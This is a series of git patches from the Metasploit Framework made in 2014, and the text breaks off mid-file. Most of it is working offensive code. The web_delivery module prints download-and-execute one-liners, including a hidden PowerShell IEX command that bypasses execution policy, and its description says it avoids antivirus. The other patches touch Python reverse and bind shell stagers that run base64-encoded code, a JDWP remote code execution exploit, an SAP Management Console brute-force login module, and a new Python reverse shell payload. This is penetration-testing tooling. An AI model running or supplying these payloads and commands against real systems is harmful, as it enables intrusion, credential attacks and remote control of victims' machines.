false ) - - session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) end def valid_mscorlib_version?(net_version, mscorlib_version) @@ -191,5 +188,10 @@ class Metasploit3 < Msf::Exploit::Local valid end + def cleanup + session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) + super + end + end From 443f9f175c0c4965d12197780e99f447ba53631e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:58:07 -0500 Subject: [PATCH 470/853] Update IE11Sandbox exploit source --- .../IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp index 69dc7c57bb..8166284000 100755 --- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp @@ -165,8 +165,8 @@ void DoDfsvcExploit() { std::vector<variant_t> startArgs; - startArgs.push_back(L"mshta"); - startArgs.push_back(GetEnv(L"MYURL")); + startArgs.push_back(L"powershell"); + startArgs.push_back(GetEnv(L"PSHCMD")); ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); } From 166748a997f6795bc68efac9bf7e77d76b49ebbd Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 11:53:32 -0400 Subject: [PATCH 471/853] Add script_web_delivery --- modules/exploits/multi/script/web_delivery.rb | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 modules/exploits/multi/script/web_delivery.rb diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb new file mode 100644 index 0000000000..f1066edd62 --- /dev/null +++ b/modules/exploits/multi/script/web_delivery.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Script Web Delivery', + 'Description' => %q{ + This module quickly fires up a web server that serves a payload. + The provided command will start the specified scripting langauge interpreter and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrew Smith "jakx" <jakx.ppr@gmail.com>', + 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + ], + 'Platform' => %w{ py php win linux}, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'N/A' + )) + register_options( + [ + OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), + ], self.class) + end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + if (datastore['SCRIPT_LANG'] == "PSH") + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + else + data = %Q|#{payload.encoded} | + end + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + def primer + url = get_uri() + p = datastore['Payload'] + if (datastore['SCRIPT_LANG'] == "PHP") + if (p[0..2] == "php") + print_status("Run the following command on the target machine:") + print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") + print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") + else + print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") + return + end + elsif (datastore['SCRIPT_LANG'] == "PY") + if (p[0..5] == "python") + print_status("Run the following command on the target machine:") + print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + else + print_error("Payload currently unsupported by Python. You will need to use a native python payload, such as python/meterpreter") + return + end + elsif (datastore['SCRIPT_LANG'] == "PSH") + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" + print_status("Run the following command on the target machine:") + print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") + else + print_error("You did not specify a valid scripting language. Exiting...") + return + end + end + end \ No newline at end of file From 0e4177fb7502848eed957db0a25516635c4022d3 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Tue, 3 Jun 2014 12:03:20 -0400 Subject: [PATCH 472/853] Pymeterpreter shorten stagers by 3 bytes --- modules/payloads/stagers/python/bind_tcp.rb | 4 ++-- modules/payloads/stagers/python/reverse_tcp.rb | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 277afc3050..60753157c1 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -42,8 +42,8 @@ module Metasploit3 cmd << "exec(d,{'s':c})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" + b64_stub = "import base64,sys;exec(base64.b64decode(" + b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 2608320d31..bbf7891414 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -40,8 +40,8 @@ module Metasploit3 cmd << "exec(d,{'s':s})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" + b64_stub = "import base64,sys;exec(base64.b64decode(" + b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub From 0e3549ebc452e5928b7ef46cf6d6bcd8a78e8d11 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Tue, 3 Jun 2014 17:27:46 +0100 Subject: [PATCH 473/853] mc brute tidy --- .../scanner/sap/sap_mgmt_con_brute_login.rb | 36 +++++++------------ 1 file changed, 12 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index aa0ad16ba7..91592cdd99 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -16,13 +16,10 @@ class Metasploit4 < Msf::Auxiliary super( 'Name' => 'SAP Management Console Brute Force', 'Description' => %q{ - This module simply attempts to brute force the username | - password for the SAP Management Console SOAP Interface. By - setting the SAP SID value, a list of default SAP users can be - tested without needing to set a USERNAME or USER_FILE value. - The default usernames are stored in - ./data/wordlists/sap_common.txt (the value of SAP SID is - automatically inserted into the username to replce <SAPSID>). + This module simply attempts to brute force the username and + password for the SAP Management Console SOAP Interface. If + the SAP_SID value is set it will replace instances of <SAPSID> + in any user/pass from any wordlist. }, 'References' => [ @@ -36,8 +33,10 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(50013), - OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']), + OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), + OptPath.new('USER_FILE', [ false, "File containing users, one per line", + File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ]) ], self.class) register_autofilter_ports([ 50013 ]) end @@ -46,23 +45,14 @@ class Metasploit4 < Msf::Auxiliary res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'GET' - }, 25) + }) if not res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return end - if datastore['SAP_SID'] != '' - if !datastore['USER_FILE'].nil? - print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist") - elsif !datastore['USERPASS_FILE'].nil? - print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist") - else - print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist") - datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt' - end - end + print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID'] each_user_pass do |user, pass| enum_user(user,pass) @@ -73,7 +63,7 @@ class Metasploit4 < Msf::Auxiliary def enum_user(user, pass) # Replace placeholder with SAP SID, if present - if datastore['SAP_SID'] != '' + if datastore['SAP_SID'] user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase) pass = pass.gsub("<SAPSID>", datastore["SAP_SID"]) end @@ -113,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary 'Content-Type' => 'text/xml; charset=UTF-8', 'Authorization' => 'Basic ' + user_pass } - }, 45) + }) return if not res @@ -136,7 +126,7 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect") + print_error("#{rhost}:#{rport} [SAP] #{rhost}] Unable to connect") return end @@ -160,10 +150,8 @@ class Metasploit4 < Msf::Auxiliary :target_host => rhost, :target_port => rport ) - return else vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'") - return end end end From 392b383c2c90e96ab4f784789bbc9831a220e722 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:07:04 -0400 Subject: [PATCH 474/853] Update --- .../exploits/multi/php/php_web_delivery.rb | 62 ------------------- .../exploits/multi/python/py_web_delivery.rb | 61 ------------------ 2 files changed, 123 deletions(-) delete mode 100644 modules/exploits/multi/php/php_web_delivery.rb delete mode 100644 modules/exploits/multi/python/py_web_delivery.rb diff --git a/modules/exploits/multi/php/php_web_delivery.rb b/modules/exploits/multi/php/php_web_delivery.rb deleted file mode 100644 index e7c237890a..0000000000 --- a/modules/exploits/multi/php/php_web_delivery.rb +++ /dev/null @@ -1,62 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'PHP Payload Web Delivery', - 'Description' => %q{ - This module quickly fires up a web server that serves a PHP payload. - The provided command will start PHP and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so is less likely to trigger AV solutions. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>', - 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure - ], - 'DefaultOptions' => - { - 'Payload' => 'php/meterpreter/reverse_tcp' - }, - 'References' => - [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] - [ 'URL', 'http://us1.php.net/eval'] - [ 'URL', 'http://us1.php.net/file_get_contents'] - ], - 'Platform' => 'php', - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'N/A')) - end - - def on_request_uri(cli, request) - print_status("Delivering Payload") - data = %Q|#{payload.encoded} ?>| - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - end - - def primer - url = get_uri() - print_status("Run the following command on the target machine:") - print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") - print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") - end -end - diff --git a/modules/exploits/multi/python/py_web_delivery.rb b/modules/exploits/multi/python/py_web_delivery.rb deleted file mode 100644 index 09a4f73365..0000000000 --- a/modules/exploits/multi/python/py_web_delivery.rb +++ /dev/null @@ -1,61 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Python Payload Web Delivery', - 'Description' => %q{ - This module quickly fires up a web server that serves a Python payload. - The provided command will start Python and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>', - 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure - ], - 'DefaultOptions' => - { - 'Payload' => 'python/meterpreter/reverse_tcp' - }, - 'References' => - [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] - [ 'URL', 'http://docs.python.org/2/library/urllib2.html'] - ], - 'Platform' => 'py', - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'N/A')) - end - - def on_request_uri(cli, request) - print_status("Delivering Payload") - data = %Q|#{payload.encoded} | - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - end - - def primer - url = get_uri() - print_status("Run the following command on the target machine:") - print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") - print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") - end -end From fdfd7f410d4a3c72147a0facb5730cf8acd4dc78 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:21:13 -0400 Subject: [PATCH 475/853] Tidy --- modules/exploits/multi/script/web_delivery.rb | 61 ++++++++++--------- 1 file changed, 33 insertions(+), 28 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index f1066edd62..04193f0044 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -26,7 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Andrew Smith "jakx" <jakx.ppr@gmail.com>', - 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' + 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', + 'Ben Campbell', + 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => { @@ -34,28 +36,31 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], + [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], + [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], - 'Platform' => %w{ py php win linux}, + 'Platform' => %w{ py php win}, 'Targets' => - [ - [ 'Automatic', { } ], - ], + [ + [ 'Automatic', { } ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'N/A' - )) - register_options( + )) + register_options( [ OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), ], self.class) - end + end def on_request_uri(cli, request) print_status("Delivering Payload") if (datastore['SCRIPT_LANG'] == "PSH") - data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) else - data = %Q|#{payload.encoded} | + data = %Q|#{payload.encoded} | end send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end @@ -64,30 +69,30 @@ class Metasploit3 < Msf::Exploit::Remote url = get_uri() p = datastore['Payload'] if (datastore['SCRIPT_LANG'] == "PHP") - if (p[0..2] == "php") - print_status("Run the following command on the target machine:") - print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") - print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") - else - print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") - return - end + if (p[0..2] == "php") + print_status("Run the following command on the target machine:") + print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") + print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") + else + print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") + return + end elsif (datastore['SCRIPT_LANG'] == "PY") if (p[0..5] == "python") print_status("Run the following command on the target machine:") print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") - print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") else print_error("Payload currently unsupported by Python. You will need to use a native python payload, such as python/meterpreter") return - end + end elsif (datastore['SCRIPT_LANG'] == "PSH") - download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" - print_status("Run the following command on the target machine:") - print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" + print_status("Run the following command on the target machine:") + print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") else - print_error("You did not specify a valid scripting language. Exiting...") - return + print_error("You did not specify a valid scripting language. Exiting...") + return end - end - end \ No newline at end of file + end + end From 5ddbdb7dfd5d5e4e1b8995c8c56723fdf5fca592 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:23:04 -0400 Subject: [PATCH 476/853] Tidy --- modules/exploits/multi/script/web_delivery.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 04193f0044..136f20a91d 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Andrew Smith "jakx" <jakx.ppr@gmail.com>', 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', - 'Ben Campbell', 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => From 62fe30798d642758ce2674bc628af036157b3470 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:48:40 -0400 Subject: [PATCH 477/853] Tidy --- modules/exploits/multi/script/web_delivery.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 136f20a91d..4fcbab7dad 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options( [ - OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), + OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH', 'PY']), ], self.class) end From 6061e5e7132b36552a98c09bc5819e55e1cf997f Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Tue, 3 Jun 2014 23:13:14 +0200 Subject: [PATCH 478/853] Fix suggestions --- .../exploits/multi/misc/java_jdwp_debugger.rb | 85 ++++++++----------- 1 file changed, 37 insertions(+), 48 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index c1cda6eded..c17e1eec26 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -6,11 +6,9 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ManualRanking + Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp - include Msf::Exploit::CheckCode include Msf::Exploit::EXE include Msf::Exploit::FileDropper @@ -127,9 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Checking for Java Debugging Wire Protocol") - sock.put(HANDSHAKE) - - res = sock.get(datastore['RESPONSE_TIMEOUT']) + res = handshake disconnect @@ -145,17 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote end + def peer + return "#{rhost}:#{rport}" + end + # Establishes handshake with the server def handshake - vprint_status("#{peer} - Sending the handshake...") - sock.put(HANDSHAKE) - res = sock.get(datastore['RESPONSE_TIMEOUT']) + return sock.get(datastore['RESPONSE_TIMEOUT']) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res - - return res == HANDSHAKE end # Forges packet for JDWP protocol @@ -166,13 +161,13 @@ class Metasploit3 < Msf::Exploit::Remote pktlen = data.length + 11 - buf = [pktlen, @myid, flags, cmdset, cmd] + buf = [pktlen, @my_id, flags, cmdset, cmd] pkt = buf.pack("NNCCC") pkt << data - @myid += 2 + @my_id += 2 return pkt end @@ -279,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote data = {} - formats.each { |fmt,name| + formats.each do |fmt,name| if fmt == "L" or fmt == 8 data[name] = buf.unpack('Q>')[0] buf.slice!(0..7) @@ -305,7 +300,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") end - } + end entries.append(data) end @@ -329,11 +324,7 @@ class Metasploit3 < Msf::Exploit::Remote entries = parse_entries(response, formats, false) - entries.each { |entry| - entry.each{ |name,value| - @vars[name] = value - } - } + entries.each { |e| @vars.merge!(e) } end @@ -355,11 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote entries = parse_entries(response, formats, false) - entries.each { |entry| - entry.each{ |name,value| - @vars[name] = value - } - } + entries.each { |e| @vars.merge!(e) } end @@ -370,7 +357,7 @@ class Metasploit3 < Msf::Exploit::Remote # Returns reference types for all classes currently loaded by the target VM - def all_classes + def get_all_classes return unless @classes.empty? @@ -394,13 +381,13 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) - @classes.each { |entry_array| + @classes.each do |entry_array| - entry_array.each { |entry| + entry_array.each do |entry| return entry if entry["signature"].downcase == name.downcase - } - } + end + end nil end @@ -434,13 +421,13 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified method is currently loaded by the target VM and returns it def get_method_by_name(classname, name, signature = nil) - @methods[classname].each { |entry| + @methods[classname].each do |entry| if signature.nil? return entry if entry["name"].downcase == name.downcase else return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase) end - } + end nil end @@ -498,12 +485,12 @@ class Metasploit3 < Msf::Exploit::Remote data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') - args.each { |kind,option| + args.each do |kind,option| data << [kind].pack('C') data << option - } + end sock.put(create_packet(EVENTSET_SIG, data)) @@ -528,7 +515,6 @@ class Metasploit3 < Msf::Exploit::Remote # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) - num = buf[2..5].unpack('N')[0] r_id = buf[6..9].unpack('N')[0] return nil unless event_id == r_id @@ -562,12 +548,12 @@ class Metasploit3 < Msf::Exploit::Remote data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') - args.each { |arg| + args.each do |arg| data << arg data << [0].pack('N') - } + end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) @@ -591,12 +577,12 @@ class Metasploit3 < Msf::Exploit::Remote data << [args.length].pack('N') - args.each { |arg| + args.each do |arg| data << arg data << [0].pack('N') - } + end sock.put(create_packet(INVOKEMETHOD_SIG, data)) @@ -615,12 +601,12 @@ class Metasploit3 < Msf::Exploit::Remote data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') - args.each { |arg| + args.each do |arg| data << arg data << [0].pack('N') - } + end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) @@ -846,7 +832,7 @@ class Metasploit3 < Msf::Exploit::Remote break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, possible is not used by application") unless break_class + fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, probably is not used by the application") unless break_class get_methods(break_class["reftype_id"]) @@ -906,18 +892,21 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - @myid = 0x01 + @my_id = 0x01 @vars = {} @classes = [] @methods = {} @os = nil - check + fail_with(Failure::NotVulnerable, "#{peer} - Doesn't seem to be vulnerable") if check == Exploit::CheckCode::Safe + + # To avoid connection refused due to previously opened connection during check + Rex::sleep(1) connect - fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake + fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake == HANDSHAKE # 1. Get the sizes of variably-sized data types in the target VM idsizes @@ -926,7 +915,7 @@ class Metasploit3 < Msf::Exploit::Remote get_version # 3. Get all currently loaded classes by the target VM - all_classes + get_all_classes # 4. Sets a breakpoint on frequently called method (user-defined) r_id = set_breakpoint @@ -942,7 +931,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") - buf = wait_for_event() + buf = wait_for_event ret = parse_event_breakpoint(buf, r_id) From b9d8f75f59e668b6c2804eabb137388944f68cd0 Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Tue, 3 Jun 2014 23:34:40 +0200 Subject: [PATCH 479/853] Add breakpoint autohitting --- .../exploits/multi/misc/java_jdwp_debugger.rb | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index c17e1eec26..959a0d7a65 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -115,6 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ OptString.new('BREAK_CLASS', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), + OptInt.new('BREAK_AUTOHIT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection', nil ]), OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) ], self.class) @@ -506,12 +507,31 @@ class Metasploit3 < Msf::Exploit::Remote # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event + force_net_event unless datastore['BREAK_AUTOHIT_PORT'].nil? || (datastore['BREAK_AUTOHIT_PORT'] == 0) + buf = read_reply(datastore['BREAK_TIMEOUT']) return buf end + # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket + def force_net_event + + vprint_status("#{peer} - Forcing network event over #{datastore['BREAK_AUTOHIT_PORT']}") + + rex_socket = Rex::Socket::Tcp.create( + 'PeerHost' => rhost, + 'PeerPort' => datastore['BREAK_AUTOHIT_PORT'], + ) + + rex_socket.put(rand_text_alphanumeric(4 + rand(4))) + + rex_socket.shutdown + + end + + # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) From c032b8ce8ef427131f067b7cf3dcc249eac8c86a Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Wed, 4 Jun 2014 02:27:06 +0100 Subject: [PATCH 480/853] Compat --- .../singles/python/shell_reverse_tcp.rb | 68 +++++++++++++++++++ .../singles/python/shell_reverse_tcp_ssl.rb | 12 ++-- 2 files changed, 73 insertions(+), 7 deletions(-) create mode 100644 modules/payloads/singles/python/shell_reverse_tcp.rb diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb new file mode 100644 index 0000000000..002e94e393 --- /dev/null +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -0,0 +1,68 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include 